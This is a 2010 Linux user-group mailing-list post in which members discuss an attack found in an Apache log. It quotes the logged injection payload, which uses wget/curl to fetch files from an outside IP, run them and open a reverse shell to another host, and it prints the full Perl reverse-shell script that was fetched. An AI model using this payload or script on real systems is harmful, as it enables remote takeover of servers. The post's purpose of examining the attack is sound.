[ Date Index ] [ Thread Index ] [ <= Previous by date / thread ] [ Next by date / thread => ]
On Tue, 22 Jun 2010 20:37:15 +0100 (BST) Gordon Henderson wrote: > > And who says Linux isn't targetted by scammers, etc... > > > I noticed this in a log-file earlier - I see this sort of thing > regularly, but thought I'd post one here for you: > > 94.199.181.165 - - [22/Jun/2010:19:13:20 +0100] "GET > /index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../proc/self/environ%00 > > HTTP/1.1" 404 270 "-" "<?system('cd /var/tmp;wget > http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget > http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80;cd > /dev/shm;curl -O http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 > 80;curl -O http://195.239.120.69/cback;chmod +x cback;./cback > 192.24.5.30 80');?> ;<?exec_shell('cd /var/tmp;wget > http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget > http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 > 80;cd /dev/shm;curl -O http://195.239.120.69/cb.txt;perl cb.txt > 192.24.5.30 80;curl -O http://195.239.120.69/cback;chmod +x > cback;./cback 192.24.5.30 80');?> ;<?passthru('cd /var/tmp;wget > http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget > http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 > 80;cd /dev/shm;curl -O http://195.239.120.69/cb.txt;perl cb.txt > 192.24.5.30 80;curl -O http://195.239.120.69/cback;chmod +x > cback;./cback 192.24.5.30 80');?>;Ustupid MF is Back; Mozilla/4.0 > (compatible; MSIE 6.0; Windows 98)" > > That's an entry from an apache server log-file. Good, eh? I'm not > sure what sort of index.php might respond to that request, however > it's trying to run a program to wget a file, then perl the file. > > The perl file it gets, bascially runs this: > > #!/usr/bin/perl > use Socket; > $cmd= "lynx"; > $system= 'echo "`uname -a`";echo "`id`";HISTFILE=/dev/null /bin/sh > -i'; $0=$cmd; > $target=$ARGV[0]; > $port=$ARGV[1]; > $iaddr=inet_aton($target) || die("Error: $!\n"); > $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); > $proto=getprotobyname('tcp'); > socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); > connect(SOCKET, $paddr) || die("Error: $!\n"); > open(STDIN, ">&SOCKET"); > open(STDOUT, ">&SOCKET"); > open(STDERR, ">&SOCKET"); > system($system); > close(STDIN); > close(STDOUT); > close(STDERR); > > which appears to send some basic information to a remote site. > > then it fetches 'cback'. This is a binary file - and guess what it's > compiled for: > > file cback > cback: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), > for GNU/Linux 2.0.0, dynamically linked (uses shared libs), stripped > > Not going to execute it, but dumping strings from it reveals this: > > %s <host> <port> > socket ok > /bin/sh > error: %s > retring in 5 seconds > fork error, retyr in 5 seconds > cannot create socket, retring in 5 seconds > GCC: (GNU) 3.3.3 > > > > My guess is that it's sitting there, waiting for commands from a > remote site - to do what? Who knows. > > So there you go - Linux *is* being targetted and obvously the target > above is for some specific site running some specific version of some > software, but who knows! I just downloaded the Reverse Engineering Compiler (REC) and decompiled the cback file to some C code. I have no idea what it says as I really haven't a clue when it comes to C/C++. I won't post the contents as this is a public and archived list. Anyone wants the RECed C code to have a look through, let me know and I can email you off-list. Grant. -- The Mailing List for the Devon & Cornwall LUG http://mailman.dclug.org.uk/listinfo/list FAQ: http://www.dcglug.org.uk/linux_adm/list-faq.html